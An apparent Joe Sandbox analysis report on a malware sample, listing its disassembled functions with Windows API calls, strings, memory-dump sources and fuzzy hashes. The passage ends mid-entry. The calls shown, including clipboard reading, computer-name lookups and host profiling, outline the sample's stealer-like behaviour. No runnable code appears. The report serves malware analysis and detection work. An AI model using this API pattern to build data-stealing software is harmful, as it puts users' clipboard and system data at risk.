String ID: $(_C$GcC$L_C
API String ID: 3911056724-3722904623
Opcode ID: 29d77c99969483fb244be614ac9c1322d8b44aee47f6fb0feb21f81443337929
Instruction ID: 939e2abe954a277f941e215ea0a71bf6c9de2423ef30fb46f3b6c37421bd8d62
Opcode Fuzzy Hash: 29d77c99969483fb244be614ac9c1322d8b44aee47f6fb0feb21f81443337929
Instruction Fuzzy Hash: 938145B04197808FE760EF65D58878FBBF0BB85708F11891EE4D88B250DBB95958CF4A

Function 004151D0 Relevance: 9.6, APIs: 1, Strings: 4, Instructions: 854
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>, xrefs: 00415AFA
JHN], xrefs: 00415824
Fi, xrefs: 0041582F
]aYZ, xrefs: 00415819

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: >$Fi$JHN]$]aYZ
API String ID: 0-3243553792
Opcode ID: 8d738d2bcdff36ad1d5c740b921475c16bdeb39ef9e774aeea09ca062810d6b7
Instruction ID: 258e40e84935e2f74b1ea95da3467c58c55d078b3bcd9439a258591578239775
Opcode Fuzzy Hash: 8d738d2bcdff36ad1d5c740b921475c16bdeb39ef9e774aeea09ca062810d6b7
Instruction Fuzzy Hash: 334202B5A08740CFD7209F24D8916ABB7E5EFC6314F544A2DE4C987392EB389845CB4B

Function 00408660 Relevance: 7.7, APIs: 5, Instructions: 232
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408684
GetCurrentThreadId.KERNEL32 ref: 0040868E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408745
GetForegroundWindow.USER32 ref: 0040875A
ExitProcess.KERNEL32 ref: 00408919

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 505ab68f1acaa9016c15f56ce89f0fd76322966980eb84c9fd08dbfa51d826f3
Instruction ID: 3c875975a44dbf145db3735e21f42f09af7a4ff13f100e4fc942dee4f10975a0
Opcode Fuzzy Hash: 505ab68f1acaa9016c15f56ce89f0fd76322966980eb84c9fd08dbfa51d826f3
Instruction Fuzzy Hash: 37517BB7E443145BD3187FA98D9636AB6D5ABC8320F0F813EA894EB3D1ED7D4C015289

Function 0042F775 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 349
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042F8F7

Strings

c, xrefs: 0042F787
;M, xrefs: 0042F90B
uqT^, xrefs: 0042F78C

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: ;M$c$uqT^
API String ID: 3960555810-586203720
Opcode ID: 7b429f08fb103b859baa42e63a5d5a27aacf9deea549376b5c309657d032b9c6
Instruction ID: a17f164b552514ff3eab755bb82c2e9a99bb07b9cca01daacd3a5de00d0a6cd0
Opcode Fuzzy Hash: 7b429f08fb103b859baa42e63a5d5a27aacf9deea549376b5c309657d032b9c6
Instruction Fuzzy Hash: CAA1927050C3D08AD335CF2A90503ABBFF1AF97700F9898AEE4D99B392D6794509CB56

Function 00409BB0 Relevance: 2.6, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

q~, xrefs: 00409C1B
RjUh, xrefs: 00409C03

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: RjUh$q~
API String ID: 0-821390907
Opcode ID: 8855f60b83088585be91379d16a2f02e503c27079cf414d5d0c434c88f6f9efe
Instruction ID: 6d830c2161e7771ecff227fedb1a789db187eda38f69635f3471a5bd615e83e5
Opcode Fuzzy Hash: 8855f60b83088585be91379d16a2f02e503c27079cf414d5d0c434c88f6f9efe
Instruction Fuzzy Hash: 2A1186306893408BD314DF60A9802BBB7A1DFD7324F181A2CE4D52B282D2B4890ACB4F

Function 0042DC65 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042DD3B

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: d2b814786c89602b91310277d7c58ffcf8b7983104f32040987854ffadf0ef4d
Instruction ID: 13af1f79f210c663e643d22597377e8b57ffb966ddfc1ded3bcbc60eecb644d4
Opcode Fuzzy Hash: d2b814786c89602b91310277d7c58ffcf8b7983104f32040987854ffadf0ef4d
Instruction Fuzzy Hash: 90219230A083D08AD725CF2598547EB7BE1AF97310F5889ADD0D9DB286CA798406CB16

Function 0043F050 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(004422FD,00000002,00000018,?,?,00000018,?,?,?), ref: 0043F07E

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00441230 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

@, xrefs: 00441298

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 91ab349052f2a5e0af7b488e8b18c958ea97dfbfada4eef86a971c076bf112b0
Instruction ID: ff9268e5f0ef520d66ccde9557708f5d44367fd1f9bf2c2a0c45829a83f3091c
Opcode Fuzzy Hash: 91ab349052f2a5e0af7b488e8b18c958ea97dfbfada4eef86a971c076bf112b0
Instruction Fuzzy Hash: 3D21F2724083049BE324DF58D8C166BB7F4FF8A364F10962DE968573E0D37598588B9A

Function 00427520 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f475004d815387e24b56f02ae5c92d5aa393327948e80634324e8b660729dd3c
Instruction ID: cad3bfd8382eeba99f8fb8003847cd3c0934f2161e46365db452dc84629a0697
Opcode Fuzzy Hash: f475004d815387e24b56f02ae5c92d5aa393327948e80634324e8b660729dd3c
Instruction Fuzzy Hash: 7BD16C7274C7115BD7249E6C988126BF7D2EBC5324F68823ED495C73D1E638EC06839A

Function 00441310 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d7b700c5193f00db228eb1ed08f42702dbe693a071f240dfb6ff437b647c801
Instruction ID: 1d6b32c01808f42ce9fc1de845d8d5c063ac5960f075d98baffef674a95e2afb
Opcode Fuzzy Hash: 4d7b700c5193f00db228eb1ed08f42702dbe693a071f240dfb6ff437b647c801
Instruction Fuzzy Hash: 1EA14B36A083018BE714DF28D89066FB3A3EFD5350F19852EE8859B3A5DB38DC51C786

Function 0042F355 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042F8F7

Strings

;M, xrefs: 0042F90B

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: ;M
API String ID: 3960555810-1963376874
Opcode ID: 10caf69f60ed97e6cb6531fdb2c0f097401c7b27184ae132eb6df8dd3fc0ae58
Instruction ID: fa8d7d5467d1784f6295f9e625bc611386494a62776c2f0367f5f23fe088cd52
Opcode Fuzzy Hash: 10caf69f60ed97e6cb6531fdb2c0f097401c7b27184ae132eb6df8dd3fc0ae58
Instruction Fuzzy Hash: 4681917050C3908AD335CF2A90513ABBBE1AF97304F94887EE4D987392D7798509CB5A

Function 0040E301 Relevance: 3.1, APIs: 2, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040E305
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E437

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e03e029c43ae576055aafef706c071e93e1b73b17aa630fa558cca424c263517
Instruction ID: badc22fc39d79d2ad2ef57e88bf8c93a5ca642e7d5b23c429d488a08980208a4
Opcode Fuzzy Hash: e03e029c43ae576055aafef706c071e93e1b73b17aa630fa558cca424c263517
Instruction Fuzzy Hash: 1341C6B4810B40AFD370EF3D994B7127EF8AB05250F504B1DF9E686AD4E631A4198BD7

Function 0040CCA3 Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CCB5
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CCD2

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 7be7b3d4cc9485e78b3e8bbd968173f92e8cc9c60a7562698af58a8b14ca9521
Instruction ID: b9662e56c7467ad356e1225328403caabe5bf832202d6c075b2334e727113f03
Opcode Fuzzy Hash: 7be7b3d4cc9485e78b3e8bbd968173f92e8cc9c60a7562698af58a8b14ca9521
Instruction Fuzzy Hash: 9BE042383D97557BFA785B55AC57F143225A786F22F344314B7263E2E98AE03101451D

Function 0043FC02 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043FC02
GetForegroundWindow.USER32 ref: 0043FC15

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 2a44a2c17b8f4ba846ff4ca7b5fe7fcc2c77f2264e2589c43696590b4c6862f2
Instruction ID: bde8246ef72a070659e7a76b00f315846862c71f1eb23ebd796a4c91db4933b2
Opcode Fuzzy Hash: 2a44a2c17b8f4ba846ff4ca7b5fe7fcc2c77f2264e2589c43696590b4c6862f2
Instruction Fuzzy Hash: E8E09277A401498BCB0C5BB5BC2729F361ABBC520C71F423ED58B17661D938A9468B86

Function 00413F06 Relevance: 1.8, APIs: 1, Instructions: 253threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 004140C8

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d74f5a0d5c7a0308015b0765f9746502a4f33eb47b1966efc83fefb1affdcfbe
Instruction ID: a07fce3562be8b4f71968b838422cee5be512d5bca0768071ffce9e40fd8e134
Opcode Fuzzy Hash: d74f5a0d5c7a0308015b0765f9746502a4f33eb47b1966efc83fefb1affdcfbe
Instruction Fuzzy Hash: 45A1F0B5A08200CBDB14DF68C5843AEB7F1EBC8314F15492EE85997391D77998C6CB8B

Function 0042DB61 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042DBF8

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 4fe5518e69fb32c52fcb733550686c9f0ba623baa35c2427973c17709272a6ce
Instruction ID: abdbcfc85cc3d590b4d9f80ed1b5259008fca6daeb1074775b7837edf01d50b0
Opcode Fuzzy Hash: 4fe5518e69fb32c52fcb733550686c9f0ba623baa35c2427973c17709272a6ce
Instruction Fuzzy Hash: 572128329183904FD3208F29C8117DFBBE5ABD6314F1A89BE84D9D72A1DE7849058B95

Function 0042DC5F Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042DD3B

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 6b0bf8f889fdf756744bf6703b1681f13e50392cec377c98574ffa542c3868df
Instruction ID: 7245d9de3664dd1b53aa825ccf4eb06682f2d51eba3296a619965df6286c0bfe
Opcode Fuzzy Hash: 6b0bf8f889fdf756744bf6703b1681f13e50392cec377c98574ffa542c3868df
Instruction Fuzzy Hash: 0C11CE30A1C3D08BD725CF24C8557EB7BE1ABC7310F18886DD0C9DB286CA798402CB16

Function 00414057 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 004140C8

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 731f161a238695e4e7fb5ada1d8a03da6e716328faea4b6fe8143de3fd4db56a
Instruction ID: 6fc9bee3fe965ab2d8a02718e9f0262d015b0fcadce505c2a3e01ed55a15df59
Opcode Fuzzy Hash: 731f161a238695e4e7fb5ada1d8a03da6e716328faea4b6fe8143de3fd4db56a
Instruction Fuzzy Hash: 74216DB5D082409BD700EF68D5863AE7BE0AB95304F04482EE88597241EB3DA599CB9B

Function 00413F25 Relevance: 1.6, APIs: 1, Instructions: 60threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 004140C8

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 54f743209ffb328fb1bcadef23338e35e1fac801d1d9dfecaf20c668b9c2ccd3
Instruction ID: faf65d23e167afe2608bca985cfd671198cf28287e4a965336946f91a72ba7ed
Opcode Fuzzy Hash: 54f743209ffb328fb1bcadef23338e35e1fac801d1d9dfecaf20c668b9c2ccd3
Instruction Fuzzy Hash: 531160F9D082048BD700FF64E5863AE7BE0AB95304F00883FE88557241D77D9599CB9B

Function 0043898F Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 004389AF

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 956965194e4c3879880e8385a27044bc88a81f50f0bdc4fa7ebe5357a51793da
Instruction ID: dee85013a50a0ba3bede4ba5c1dbffa65f4075042fd01df7824f7729c30bfe49
Opcode Fuzzy Hash: 956965194e4c3879880e8385a27044bc88a81f50f0bdc4fa7ebe5357a51793da
Instruction Fuzzy Hash: D0115970A19280CFDB18CF38CD94B69BFB2AFCA305F1881DCD48987396CA359806CB11

Function 0043EFE0 Relevance: 1.5, APIs: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,00000000,?,0040B65E,?,?), ref: 0043F012

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ba2b12a4c8b63bfddb0ea029f33ffa71bde5286063443eba3e10ccdda4c090f1
Instruction ID: 1e20f94c7d93bff00bb7af5e81629b14c497d637b4691000bbc6c064ce59cb60
Opcode Fuzzy Hash: ba2b12a4c8b63bfddb0ea029f33ffa71bde5286063443eba3e10ccdda4c090f1
Instruction Fuzzy Hash: 7BF0EC76914211EBD6145F2CBC01D673778DF8B714F111836F505D7112D739EC11D99A

Function 004313CF Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0043141A

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 7693d5087307d70c2225b2f5b7a5a5e8813f453b54809cdd879d8216520e0831
Instruction ID: 8bd587e198a483ca91745067cf552d33ee8b799b06de1d844888fcaa4f8121cc
Opcode Fuzzy Hash: 7693d5087307d70c2225b2f5b7a5a5e8813f453b54809cdd879d8216520e0831
Instruction Fuzzy Hash: F7F0E7746087018FE301DF25C5E571BBBE0BB8A304F10C91CD1A44B354C7B5A6498F82

Function 00433689 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004336D3

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 08f22d7be0c78e64335db71f63ae92ae9634d60515c2c8830fdf75eb2b6a953b
Instruction ID: 09e4eb2bbc1e8e356619c4d93f3b34aec8616dc214137210f461328fe75fbdb5
Opcode Fuzzy Hash: 08f22d7be0c78e64335db71f63ae92ae9634d60515c2c8830fdf75eb2b6a953b
Instruction Fuzzy Hash: 25F0F4746087018FE300DF24C49934BBBE1AB84308F15891CE4945B294CBB5A5498F82

Function 0043D480 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,FFFFFFFF,0043D677,00000000,?,00000000,?,?,00427ADB,DB4ED94B), ref: 0043D4A0

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e8e21ba935653368a9726be937bc089359b5990c85b4714d283e3eb82f8088a1
Instruction ID: bd8716210ec8d959d22720ba78e382fd4d79b7ad4465810db998c3e75f578eb6
Opcode Fuzzy Hash: e8e21ba935653368a9726be937bc089359b5990c85b4714d283e3eb82f8088a1
Instruction Fuzzy Hash: 0BD0C936419622EBC6102F18BC06BCB3A94DF4A321F0748A6B540AA175C678EC919AD8

Function 0043D460 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,989BBA9D,E43AA887,0040886E,989BBA9D), ref: 0043D470

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d4caeb4f47506de59fb4607f93ff2b774fe5ad36e251d27d0d6278e9ce35c44f
Instruction ID: d2e29cc27a65fe1ca6c2eb106a79703fbeb51fc8642af10384060e15434c0d6e
Opcode Fuzzy Hash: d4caeb4f47506de59fb4607f93ff2b774fe5ad36e251d27d0d6278e9ce35c44f
Instruction Fuzzy Hash: 7AC09231045220AFDA146B15FD09FCA3F68EF4A361F0204A6B144A70B2C7B0BC92DED9

Non-executed Functions

Function 00435A30 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 114clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00435A44
GetClipboardData.USER32 ref: 00435A5F
GlobalLock.KERNEL32 ref: 00435A78
GetWindowLongW.USER32 ref: 00435AD7
GlobalUnlock.KERNEL32 ref: 00435BA4
CloseClipboard.USER32 ref: 00435BAF

Strings

{, xrefs: 00435B29
5, xrefs: 00435AE8

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: 5${
API String ID: 2832541153-3957241723
Opcode ID: 4be3ae1e7b685d8aa39f07097afd4b1f8086d6ba818c78ade9bcec8ec36e32c7
Instruction ID: 77f75d3f843e1ddc5715d0d0e0f4209c47f0aacc074521cc1377cbd859072ea3
Opcode Fuzzy Hash: 4be3ae1e7b685d8aa39f07097afd4b1f8086d6ba818c78ade9bcec8ec36e32c7
Instruction Fuzzy Hash: 6241BE7010C7818FC301AF78998931EBFE0AB96324F094A3EE4D5862D2D6788589C7A7

Function 0042E91D Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 282COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042EBE2

Strings

0, xrefs: 0042EB91
*'!*, xrefs: 0042EA3C
ou, xrefs: 0042EBE2
h, xrefs: 0042EC02
"}e, xrefs: 0042EC07
-}e, xrefs: 0042EC31

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: FreeLibrary
String ID: "}e$*'!*$-}e$0$h$ou
API String ID: 3664257935-1343566695
Opcode ID: 20a4a6c314db585875ca8717a96222d0e4d5fb709ecd1fb99d38c7804a204f9d
Instruction ID: 9a2cc8735b334f5eb7dd33608fe55bf2896880d18ec1a6c6a9828f2004405501
Opcode Fuzzy Hash: 20a4a6c314db585875ca8717a96222d0e4d5fb709ecd1fb99d38c7804a204f9d
Instruction Fuzzy Hash: C7813B2420D3D18BD724CB2A995072BFFE1AFD6304F18899EE4D59B392C6398846C75B

Function 0041812C Relevance: 9.8, Strings: 7, Instructions: 1028COMMON

Download Yara Rule

Strings

>, xrefs: 0041883E
D, xrefs: 004184DB
'[ux, xrefs: 00418B3D
^, xrefs: 00418BD0
"[ux, xrefs: 00418ACC
'[ux, xrefs: 00418A8D
"[ux, xrefs: 00418B7C

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: "[ux$"[ux$'[ux$'[ux$>$D$^
API String ID: 0-301496773
Opcode ID: c4c09141dcdc9d42205aa105af6dba0d0d7c7be176408c342585578faee69009
Instruction ID: ad97de9c1cfb1f1073a1bcdbefd1ec41e1c21d92c4fe56fe58a12e60a508c2ff
Opcode Fuzzy Hash: c4c09141dcdc9d42205aa105af6dba0d0d7c7be176408c342585578faee69009
Instruction Fuzzy Hash: 6152F5745083409FD724CF24D8607BB77E1FF8A314F154A6DE0DA8B2A2EB389945CB5A

Function 00416C19 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 471COMMON

Download Yara Rule

Strings

